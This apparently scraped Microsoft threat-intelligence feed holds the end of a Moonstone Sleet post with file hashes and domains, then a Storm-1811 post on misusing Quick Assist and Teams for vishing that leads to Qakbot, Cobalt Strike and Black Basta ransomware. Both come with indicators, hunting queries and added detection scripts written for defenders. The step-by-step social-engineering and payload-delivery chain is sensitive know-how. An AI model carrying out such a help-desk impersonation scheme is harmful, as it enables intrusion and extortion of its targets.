| project TimeGenerated, DisplayName, ThreatName, ThreatFamilyName, PublicIP, AlertSeverity, Description, LoggedOnUsers, DeviceId, TenantId, CompromisedEntity, ProductName, Entities, HostName, HostNameDomain

Indicators of compromise

Malicious files

File (role) and SHA-256 hash:

  • putty.exe (drops SplitLoader): f59035192098e44b86c4648a0de4078edbe80352260276f4755d15d354f5fc58
  • putty.exe (drops SplitLoader): cb97ec024c04150ad419d1af2d1eb66b5c48ab5f345409d9d791db574981a3fb
  • [random].dat (SplitLoader): 39d7407e76080ec5d838c8ebca5182f3ac4a5f416ff7bda9cbc4efffd78b4ff5
  • Package.db, thumbs.db (YouieLoad via npm): 70c5b64589277ace59db86d19d846a9236214b48aacabbaf880f2b6355ab5260
  • adb.bin, u.bin, Id.bin (YouieLoad): cafaa7bc3277711509dc0800ed53b82f645e86c195e85fbf34430bbc75c39c24
  • data.tmp (YouieLoad): 9863173e0a45318f776e36b1a8529380362af8f3e73a2b4875e30d31ad7bd3c1
  • delfi-tank-unity.exe: f66122a3e1eaa7dcb7c13838037573dace4e5a1c474a23006417274c0c8608be
  • DeTankWar.exe: 56554117d96d12bd3504ebef2a8f28e790dd1fe583c33ad58ccbf614313ead8c
  • DeTankWar.exe: ecce739b556f26de07adbfc660a958ba2dca432f70a8c4dd01466141a6551146
  • NVUnityPlugin.dll, Unityplayer.dll (YouieLoad via tank game): 09d152aa2b6261e3b0a1d1c19fa8032f215932186829cfcca954cc5e84a6cc38

Moonstone Sleet domains

bestonlinefilmstudio[.]org
blockchain-newtech[.]com
ccwaterfall[.]com
chaingrown[.]com
defitankzone[.]com
detankwar[.]com
freenet-zhilly[.]org
matrixane[.]com
pointdnt[.]com
starglowventures[.]com
mingeloem[.]com
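To sweep your own telemetry for the indicators in this section, here is an added example in Python (not Microsoft's code): it refangs the defanged domains above, matches DNS query names either exactly or as subdomains, and matches SHA-256 values case-insensitively against a file inventory export. The DNS log line layout (host=... qname=...) and both sample data sets are constructed for the example; adapt the parser to your own log source.

```python
"""Sweep DNS logs and a file inventory for the Moonstone Sleet indicators above.
Added example, not Microsoft's code. Log layout and sample data are constructed."""
import re

# Domains exactly as published above (defanged with [.]).
DEFANGED_DOMAINS = """
bestonlinefilmstudio[.]org
blockchain-newtech[.]com
ccwaterfall[.]com
chaingrown[.]com
defitankzone[.]com
detankwar[.]com
freenet-zhilly[.]org
matrixane[.]com
pointdnt[.]com
starglowventures[.]com
mingeloem[.]com
"""

# SHA-256 values from the malicious files list above, keyed lowercase.
MALICIOUS_SHA256 = {
    "f59035192098e44b86c4648a0de4078edbe80352260276f4755d15d354f5fc58": "putty.exe (drops SplitLoader)",
    "cb97ec024c04150ad419d1af2d1eb66b5c48ab5f345409d9d791db574981a3fb": "putty.exe (drops SplitLoader)",
    "39d7407e76080ec5d838c8ebca5182f3ac4a5f416ff7bda9cbc4efffd78b4ff5": "[random].dat (SplitLoader)",
    "70c5b64589277ace59db86d19d846a9236214b48aacabbaf880f2b6355ab5260": "Package.db, thumbs.db (YouieLoad via npm)",
    "cafaa7bc3277711509dc0800ed53b82f645e86c195e85fbf34430bbc75c39c24": "adb.bin, u.bin, Id.bin (YouieLoad)",
    "9863173e0a45318f776e36b1a8529380362af8f3e73a2b4875e30d31ad7bd3c1": "data.tmp (YouieLoad)",
    "f66122a3e1eaa7dcb7c13838037573dace4e5a1c474a23006417274c0c8608be": "delfi-tank-unity.exe",
    "56554117d96d12bd3504ebef2a8f28e790dd1fe583c33ad58ccbf614313ead8c": "DeTankWar.exe",
    "ecce739b556f26de07adbfc660a958ba2dca432f70a8c4dd01466141a6551146": "DeTankWar.exe",
    "09d152aa2b6261e3b0a1d1c19fa8032f215932186829cfcca954cc5e84a6cc38": "NVUnityPlugin.dll, Unityplayer.dll (YouieLoad via tank game)",
}


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into the form that appears in log data."""
    return (indicator.strip().lower()
            .replace("[.]", ".").replace("(.)", ".").replace("{.}", ".")
            .replace("hxxp", "http"))


IOC_DOMAINS = frozenset(refang(d) for d in DEFANGED_DOMAINS.split())


def domain_match(qname: str):
    """Return the matching IOC on an exact or subdomain hit, else None.
    'www.detankwar.com' matches; 'notmatrixane.com' must not."""
    q = qname.rstrip(".").lower()
    for ioc in IOC_DOMAINS:
        if q == ioc or q.endswith("." + ioc):
            return ioc
    return None


# Assumed DNS log layout: '<timestamp> host=<name> qname=<query> type=<rr>'.
DNS_LINE = re.compile(r"host=(?P<host>\S+)\s+qname=(?P<qname>\S+)")


def sweep_dns(lines) -> list:
    """One hit per log line whose query name is an IOC domain or a subdomain of one."""
    hits = []
    for line in lines:
        m = DNS_LINE.search(line)
        if not m:
            continue
        ioc = domain_match(m.group("qname"))
        if ioc:
            hits.append({"host": m.group("host"), "qname": m.group("qname"), "ioc": ioc})
    return hits


def sweep_hashes(inventory) -> list:
    """inventory: iterable of (host, path, sha256); hash case is normalised."""
    hits = []
    for host, path, digest in inventory:
        name = MALICIOUS_SHA256.get(digest.strip().lower())
        if name:
            hits.append({"host": host, "path": path, "sha256": digest.lower(), "ioc": name})
    return hits


# Constructed sample data for the example (the second hash is that of an empty file).
SAMPLE_DNS = [
    "2024-05-20T10:15:02Z host=WS-042 qname=www.detankwar.com type=A",
    "2024-05-20T10:15:03Z host=WS-042 qname=cdn.contoso.com type=A",
    "2024-05-20T10:16:40Z host=WS-017 qname=notmatrixane.com type=A",
    "2024-05-20T10:17:11Z host=WS-017 qname=mingeloem.com. type=A",
]
SAMPLE_INVENTORY = [
    ("WS-042", r"C:\Users\dev\Downloads\putty.exe",
     "f59035192098e44b86c4648a0de4078edbe80352260276f4755d15d354f5fc58".upper()),
    ("WS-017", r"C:\Program Files\PuTTY\putty.exe",
     "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"),
]

if __name__ == "__main__":
    for hit in sweep_dns(SAMPLE_DNS) + sweep_hashes(SAMPLE_INVENTORY):
        print(hit)
```

The subdomain rule is deliberately `endswith("." + ioc)` rather than a substring test, so a lookalike such as notmatrixane.com does not fire; the trailing dot and mixed case in the sample rows are there because real DNS and hashing tools emit both.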


Threat actors misusing Quick Assist in social engineering attacks leading to ransomware http://approjects.co.za/?big=en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/ Wed, 15 May 2024 16:00:00 +0000 Microsoft Threat Intelligence has observed Storm-1811 misusing the client management tool Quick Assist to target users in social engineering attacks that lead to malware like Qakbot followed by Black Basta ransomware deployment.


June 2024 update: At the end of May 2024, Microsoft Threat Intelligence observed Storm-1811 using Microsoft Teams as another vector to contact target users. Microsoft assesses that the threat actor uses Teams to send messages and initiate calls in an attempt to impersonate IT or help desk personnel. This activity leads to Quick Assist misuse, followed by credential theft using EvilProxy, execution of batch scripts, and use of SystemBC for persistence and command and control.

Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool Quick Assist to target users in social engineering attacks. Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware. The observed activity begins with impersonation through voice phishing (vishing), followed by delivery of malicious tools, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware like Qakbot, Cobalt Strike, and ultimately Black Basta ransomware.

Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting. Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device.

In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams. Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity.

Organizations can also reduce the risk of attacks by blocking or uninstalling Quick Assist and other remote management tools if the tools are not in use in their environment. Quick Assist is installed by default on devices running Windows 11. Additionally, tech support scams are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services. Educating users on how to recognize such scams can significantly reduce the impact of social engineering attacks.

Social engineering

One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks. Vishing attacks are a form of social engineering that involves callers luring targets into revealing sensitive information under false pretenses or tricking targets into carrying out actions on behalf of the caller.

For example, threat actors might attempt to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device. In other cases, threat actors initiate link listing attacks – a type of email bombing attack, where threat actors sign up targeted emails to multiple email subscription services to flood email addresses indirectly with subscribed content. Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue.

At the end of May 2024, Microsoft observed Storm-1811 using Microsoft Teams to send messages to and call target users. Tenants created by the threat actor are used to impersonate help desk personnel with names displayed as “Help Desk”, “Help Desk IT”, “Help Desk Support”, and “IT Support”. Microsoft has taken action to mitigate this by suspending identified accounts and tenants associated with inauthentic behavior. Apply security best practices for Microsoft Teams to safeguard Teams users.

During the call, the threat actor persuades the user to grant them access to their device through Quick Assist. The target user only needs to press CTRL + Windows + Q and enter the security code provided by the threat actor, as shown in the figure below.

Figure 1. Quick Assist prompt to enter security code

After the target enters the security code, they receive a dialog box asking for permission to allow screen sharing. Selecting Allow shares the user’s screen with the actor.

Figure 2. Quick Assist dialog box asking permission to allow screen sharing

Once in the session, the threat actor can select Request Control, which if approved by the target, grants the actor full control of the target’s device.

Figure 3. Quick Assist dialog box asking permission to allow control

Follow-on activity leading to Black Basta ransomware

Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads. Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials. In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.

Figure 4. Examples of cURL commands to download batch files and ZIP files

Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811.

ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.

These RMM tools are commonly used by threat actors because of their extensive capabilities and their ability to blend in with the environment. In some cases, the actors used the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence.

After the threat actor installs the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement.

In cases where Storm-1811 relies on Teams messages followed by phone calls and remote access through Quick Assist, the threat actor uses BITSAdmin to download batch files and ZIP files from a malicious site, for example antispam3[.]com. Storm-1811 also provides the target user with malicious links that redirect the user to an EvilProxy phishing site to input credentials. EvilProxy is an adversary-in-the-middle (AiTM) phishing kit used to capture passwords, hijack a user’s sign-in session, and skip the authentication process. Storm-1811 was also observed deploying SystemBC, a post-compromise commodity remote access trojan (RAT) and proxy tool typically used to establish command-and-control communication, establish persistence in a compromised environment, and deploy follow-on malware, notably ransomware.

In several cases, Storm-1811 uses PsExec to deploy Black Basta ransomware throughout the network. Black Basta is a closed ransomware offering (exclusive and not openly marketed like ransomware as a service) distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development. Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from Qakbot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat. In the next sections, we share recommendations for improving defenses against this threat, including best practices when using Quick Assist and mitigations for reducing the impact of Black Basta and other ransomware.

Recommendations

Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:

  • Consider blocking or uninstalling Quick Assist and other remote monitoring and management tools if these tools are not in use in your environment. If your organization utilizes another remote support tool such as Remote Help, block or remove Quick Assist as a best practice. Remote Help is part of the Microsoft Intune Suite and provides authentication and security controls for helpdesk connections.
  • Educate users about protecting themselves from tech support scams. Tech support scams are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services.
  • Only allow a helper to connect to your device using Quick Assist if you initiated the interaction by contacting Microsoft Support or your IT support staff directly. Don’t provide access to anyone claiming to have an urgent need to access your device.
  • If you suspect that the person connecting to your device is conducting malicious activity, disconnect from the session immediately and report to your local authorities and/or any relevant IT members within your organization.
  • Users who have been affected by a tech support scam can also use the Microsoft technical support scam form to report it.

Microsoft recommends the following mitigations to reduce the impact of this threat:

  • Educate users about protecting personal and business information in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.
  • Educate users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent through instant messaging applications or social networks as well as suspicious phone calls.
  • Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. Microsoft Defender for Office 365 brings together incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.
  • Educate Microsoft Teams users to verify ‘External’ tagging on communication attempts from external entities, be cautious about what they share, and never share their account information or authorize sign-in requests over chat.
  • Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
  • Apply Microsoft’s security best practices for Microsoft Teams to safeguard Teams users.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Enable investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Refer to Microsoft’s human-operated ransomware overview for general hardening recommendations against ransomware attacks.

Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent common attack techniques:

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:

Black Basta threat components are detected as the following:

Microsoft Defender Antivirus detects Beacon running on a victim process as the following:

Additional Cobalt Strike components are detected as the following:

SystemBC components are detected as:

Microsoft Defender for Endpoint

Alerts with the following title in the security center can indicate threat activity on your network:

  • Suspicious activity using Quick Assist

The following alerts might also indicate activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

  • Suspicious curl behavior
  • Suspicious bitsadmin activity
  • Suspicious file creation by BITSAdmin tool
  • A file or network connection related to a ransomware-linked emerging threat activity group detected (this alert captures Storm-1811 activity)
  • Ransomware-linked emerging threat activity group Storm-0303 detected (this alert captures some Qakbot distributor activity)
  • Possible Qakbot activity
  • Possible NetSupport Manager activity
  • Possibly malicious use of proxy or tunneling tool
  • Suspicious usage of remote management software
  • Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
  • Human-operated attack using Cobalt Strike
  • Human-operated attack implant tool detected
  • Ransomware behavior detected in the file system

Indicators of compromise

Domain names:

  • upd7a[.]com
  • upd7[.]com
  • upd9[.]com
  • upd5[.]pro
  • antispam3[.]com
  • antispam2[.]com

SHA-256:

  • 71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8
  • 0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0
  • 1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30
  • 93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7
  • 1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb

ScreenConnect relay:

  • instance-olqdnn-relay.screenconnect[.]com

NetSupport C2:

  • greekpool[.]com

Cobalt Strike Beacon C2:

  • zziveastnews[.]com
  • realsepnews[.]com

Advanced hunting

Microsoft Defender XDR

To locate possible malicious activity, run the following queries in the Microsoft Defender portal.

This query looks for possible email bombing activity:

EmailEvents
| where EmailDirection == "Inbound"
| make-series Emailcount = count() on Timestamp step 1h by RecipientObjectId
| extend (Anomalies, AnomalyScore, ExpectedEmails) = series_decompose_anomalies(Emailcount)
| mv-expand Emailcount, Anomalies, AnomalyScore, ExpectedEmails to typeof(double), Timestamp
| where Anomalies != 0
| where AnomalyScore >= 10
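The query above turns each recipient's inbound mail into an hourly series and keeps the hours whose volume is anomalous, which is the signature of the link-listing email bomb described earlier. The following is an added, stand-alone approximation of that logic in Python; it is not code from the Microsoft post. It replaces series_decompose_anomalies with a median/MAD modified z-score (so scores are not numerically identical to Defender's), and the email events, recipient addresses and 48-hour window are constructed for the example.

```python
"""Email-bombing detector: an added example approximating the KQL above, not
code from the Microsoft post. The Defender query buckets inbound mail per
recipient into hourly series and keeps hours whose count is anomalous. This
stand-alone version does the same with a median/MAD modified z-score in place
of series_decompose_anomalies, so the scores are not numerically identical.
All email events below are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

WINDOW_START = datetime(2024, 5, 10, 0, 0)  # constructed 48-hour window
WINDOW_HOURS = 48

# Constructed inbound EmailEvents as (Timestamp, RecipientObjectId) tuples.
EMAIL_EVENTS = []
for hour in range(WINDOW_HOURS):
    ts = WINDOW_START + timedelta(hours=hour)
    EMAIL_EVENTS += [(ts, "victim@contoso.example")] * (2 + hour % 3)     # 2-4 per hour
    EMAIL_EVENTS += [(ts, "colleague@contoso.example")] * (1 + hour % 2)  # 1-2 per hour
# Hour 40: subscription confirmations flood one recipient (the link-listing attack).
EMAIL_EVENTS += [(WINDOW_START + timedelta(hours=40), "victim@contoso.example")] * 250


def hourly_series(events, start=WINDOW_START, hours=WINDOW_HOURS):
    """make-series equivalent: {recipient: [count per hour]}, zero-filled."""
    counts = defaultdict(lambda: [0] * hours)
    for ts, recipient in events:
        idx = int((ts - start).total_seconds() // 3600)
        if 0 <= idx < hours:
            counts[recipient][idx] += 1
    return counts


def robust_anomalies(series, threshold=10.0):
    """Return (index, value, score) for points whose modified z-score
    (0.6745 * (x - median) / MAD) is at least threshold. Stands in for
    series_decompose_anomalies plus the AnomalyScore >= 10 filter."""
    med = median(series)
    mad = median(abs(x - med) for x in series) or 1.0  # constant series: avoid /0
    flagged = []
    for i, x in enumerate(series):
        score = 0.6745 * (x - med) / mad
        if score >= threshold:
            flagged.append((i, x, round(score, 1)))
    return flagged


def detect_email_bombing(events, start=WINDOW_START, hours=WINDOW_HOURS, threshold=10.0):
    """Per-recipient anomalous hours: the rows the KQL would output."""
    findings = []
    for recipient, series in hourly_series(events, start, hours).items():
        for idx, count, score in robust_anomalies(series, threshold):
            findings.append({"recipient": recipient,
                             "hour": (start + timedelta(hours=idx)).isoformat(),
                             "count": count, "score": score})
    return findings


if __name__ == "__main__":
    for finding in detect_email_bombing(EMAIL_EVENTS):
        print(finding)
```

Only the flooded recipient and hour are returned; the colleague's normal 1-2 messages per hour never approach the threshold. A flagged hour is a triage lead, not proof of an attack: the follow-on signal the post describes is a help desk call or Teams message to that same recipient shortly afterwards.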

This query looks for possible Teams phishing activity:

let suspiciousUpns = DeviceProcessEvents
| where DeviceId == "alertedMachine"
| where isnotempty(InitiatingProcessAccountUpn)
| project InitiatingProcessAccountUpn;
CloudAppEvents
| where Application == "Microsoft Teams"
| where ActionType == "ChatCreated"
| where isempty(AccountObjectId)
| where RawEventData.ParticipantInfo.HasForeignTenantUsers == true
| where RawEventData.CommunicationType == "OneonOne"
| where RawEventData.ParticipantInfo.HasGuestUsers == false
| where RawEventData.ParticipantInfo.HasOtherGuestUsers == false
| where RawEventData.Members[0].DisplayName in ("Microsoft  Security", "Help Desk", "Help Desk Team", "Help Desk IT", "Microsoft Security", "office")
| where AccountId has "@"
| extend TargetUPN = tolower(tostring(RawEventData.Members[1].UPN))
| where TargetUPN in (suspiciousUpns)
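The Teams query above joins the account UPNs seen on an alerted device (the DeviceId value "alertedMachine" is a placeholder to replace with the real device ID) against Teams ChatCreated events, and keeps one-on-one chats started by an external-tenant account that uses a help-desk style display name. The following is an added Python rendering of the same filter, not code from the Microsoft post; the events, tenant names and UPNs are constructed, and the field names follow the CloudAppEvents columns the query references.

```python
"""Teams help-desk impersonation triage: an added example mirroring the KQL
above, not code from the Microsoft post. Event shapes and names are
constructed; field names follow the CloudAppEvents columns the query uses.
"""

# Display names from the query. KQL's in() is case-sensitive; this helper
# lowercases both sides, which is what the in~() operator would do. The double
# space in the first entry is kept as it appears in the query.
SUSPICIOUS_DISPLAY_NAMES = {
    "microsoft  security", "help desk", "help desk team",
    "help desk it", "microsoft security", "office",
}

# Constructed: InitiatingProcessAccountUpn values from the alerted device.
DEVICE_UPNS = {"alice@contoso.example", "bob@contoso.example"}


def teams_event(sender, sender_name, target, target_name, *, one_on_one=True,
                foreign=True, guests=False, object_id=""):
    """Build a CloudAppEvents-like row (constructed test data helper)."""
    return {
        "Application": "Microsoft Teams",
        "ActionType": "ChatCreated",
        "AccountObjectId": object_id,
        "AccountId": sender,
        "RawEventData": {
            "CommunicationType": "OneonOne" if one_on_one else "Group",
            "ParticipantInfo": {
                "HasForeignTenantUsers": foreign,
                "HasGuestUsers": guests,
                "HasOtherGuestUsers": False,
            },
            "Members": [
                {"DisplayName": sender_name, "UPN": sender},
                {"DisplayName": target_name, "UPN": target},
            ],
        },
    }


TEAMS_EVENTS = [
    # External tenant posing as "Help Desk IT", messaging a user on the device.
    teams_event("support@evil-tenant.example", "Help Desk IT",
                "Alice@contoso.example", "Alice"),
    # Internal chat from a home-tenant identity: has an AccountObjectId, not foreign.
    teams_event("bob@contoso.example", "Bob", "alice@contoso.example", "Alice",
                foreign=False, object_id="11111111-2222-3333-4444-555555555555"),
    # External help-desk name, but a group chat: outside the hunt's scope.
    teams_event("support@evil-tenant.example", "Help Desk",
                "bob@contoso.example", "Bob", one_on_one=False),
    # External help-desk name targeting a UPN never seen on the alerted device.
    teams_event("support@evil-tenant.example", "Help Desk",
                "carol@contoso.example", "Carol"),
]


def is_suspicious_helpdesk_chat(event, device_upns):
    """Apply the query's where clauses to one event."""
    raw = event.get("RawEventData", {})
    info = raw.get("ParticipantInfo", {})
    members = raw.get("Members", [])
    if event.get("Application") != "Microsoft Teams":
        return False
    if event.get("ActionType") != "ChatCreated":
        return False
    if event.get("AccountObjectId"):           # isempty(AccountObjectId)
        return False
    if "@" not in event.get("AccountId", ""):  # AccountId has "@"
        return False
    if info.get("HasForeignTenantUsers") is not True:
        return False
    if info.get("HasGuestUsers") or info.get("HasOtherGuestUsers"):
        return False
    if raw.get("CommunicationType") != "OneonOne":
        return False
    if len(members) < 2:
        return False
    if members[0].get("DisplayName", "").lower() not in SUSPICIOUS_DISPLAY_NAMES:
        return False
    target_upn = members[1].get("UPN", "").lower()
    return target_upn in {u.lower() for u in device_upns}


def find_suspicious_chats(events, device_upns):
    """Return (sender AccountId, target UPN) pairs matching the hunt."""
    return [(e["AccountId"], e["RawEventData"]["Members"][1]["UPN"].lower())
            for e in events if is_suspicious_helpdesk_chat(e, device_upns)]


if __name__ == "__main__":
    for sender, target in find_suspicious_chats(TEAMS_EVENTS, DEVICE_UPNS):
        print(f"suspicious help-desk chat: {sender} -> {target}")
```

Of the four constructed events only the first survives every clause; the home-tenant chat, the group chat and the chat aimed at a user who never appeared on the alerted device are all dropped, which is the point of scoping the hunt to UPNs from DeviceProcessEvents. The display-name list is a starting point; extend it with the names your own help desk does not use so that legitimate support chats do not match.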

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel also has a range of hunting queries available in Sentinel GitHub repo or as part of Sentinel solutions that customers can use to detect the activity detailed in this blog in addition to Microsoft Defender detections. These hunting queries include the following:

Qakbot:

Cobalt Strike:
